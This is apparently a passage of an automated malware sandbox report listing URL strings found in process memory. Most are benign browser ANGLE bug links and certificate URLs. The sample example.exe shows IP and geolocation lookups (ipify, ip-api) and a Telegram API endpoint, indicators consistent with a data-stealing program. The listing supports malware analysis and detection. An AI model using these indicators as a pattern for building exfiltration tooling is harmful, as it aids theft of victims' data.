    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
    Source: chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
    Source: chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036a
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
    Source: chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
    Source: chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
    Source: chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
    Source: example.exe, 0000000C.00000002.3645897805.0000019641C92000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org:443/
    Source: example.exe, 0000000C.00000002.3645897805.0000019641D58000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org:443/(2
    Source: example.exe, 0000000C.00000002.3645394042.000001963F290000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
    Source: example.exe, 0000000C.00000002.3645394042.000001963F290000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
    Source: example.exe, 0000000C.00000002.3645394042.000001963F290000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
    Source: example.exe, 0000000C.00000002.3645394042.000001963F290000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
    Source: example.exe, 0000000C.00000002.3645394042.000001963F290000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
    Source: example.exe, 0000000C.00000002.3645394042.000001963F290000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
    Source: example.exe, 0000000C.00000002.3645394042.000001963F290000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
    Source: example.exe, 0000000C.00000000.3282635316.00007FF6090DD000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.drString found in binary or memory: http://html4/loose.dtd
    Source: example.exe, 0000000C.00000002.3645897805.0000019641CCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/
    Source: example.exe, 0000000C.00000002.3645897805.0000019641D58000.00000004.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3645897805.0000019641CCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/8.46.123.1890E
    Source: example.exe, 0000000C.00000002.3645897805.0000019641CCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/P
    Source: example.exe, 0000000C.00000002.3645791369.0000019641400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/Ucountry
    Source: example.exe, 0000000C.00000002.3645897805.0000019641CCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com:80/(2
    Source: msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
    Source: example.exe, 0000000C.00000002.3645394042.000001963F290000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: example.exe, 0000000C.00000002.3645394042.000001963F290000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
    Source: msedge.exe, 00000010.00000002.3517574489.00003A8400058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
    Source: example.exe, 0000000C.00000002.3645394042.000001963F290000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
    Source: example.exe, 0000000C.00000002.3647365341.000001D6D44E0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648900484.000001D6D5381000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
    Source: example.exe, 0000000C.00000002.3647365341.000001D6D44E0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647365341.000001D6D4C56000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648900484.000001D6D5AF6000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3648900484.000001D6D5381000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/binaryformatter
    Source: example.exe.0.drString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
    Source: example.exe, 0000000C.00000002.3647365341.000001D6D44E0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647365341.000001D6D4C56000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648900484.000001D6D5AF6000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3648900484.000001D6D5381000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com
    Source: example.exe, 0000000C.00000002.3647365341.000001D6D44E0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647365341.000001D6D4C56000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648900484.000001D6D5381000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehost
    Source: example.exe, 0000000C.00000002.3647365341.000001D6D4C56000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
    Source: example.exe, 0000000C.00000002.3648900484.000001D6D5AF6000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3647121204.000001D6D43E1000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3648255484.000001D6D5180000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3646977396.000001D6D3F70000.00000004.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3648674007.000001D6D5220000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3645558187.000001963F311000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3648304673.000001D6D51A1000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3647010977.000001D6D4370000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
    Source: example.exe, 0000000C.00000000.3282635316.00007FF6090DD000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.drString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
    Source: example.exe, 0000000C.00000000.3282635316.00007FF6090DD000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.drString found in binary or memory: https://aka.ms/dotnet/download
    Source: example.exe, 0000000C.00000000.3282635316.00007FF6090DD000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.drString found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
    Source: example.exe, 0000000C.00000000.3282635316.00007FF6090DD000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.drString found in binary or memory: https://aka.ms/dotnet/info
    Source: example.exe, 0000000C.00000000.3282635316.00007FF6090DD000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.drString found in binary or memory: https://aka.ms/dotnet/sdk-not-foundProbing
    Source: example.exe, 0000000C.00000002.3648900484.000001D6D5381000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
    Source: chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
    Source: chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
    Source: msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162supportsVertexInputDynamicState
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
    Source: chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
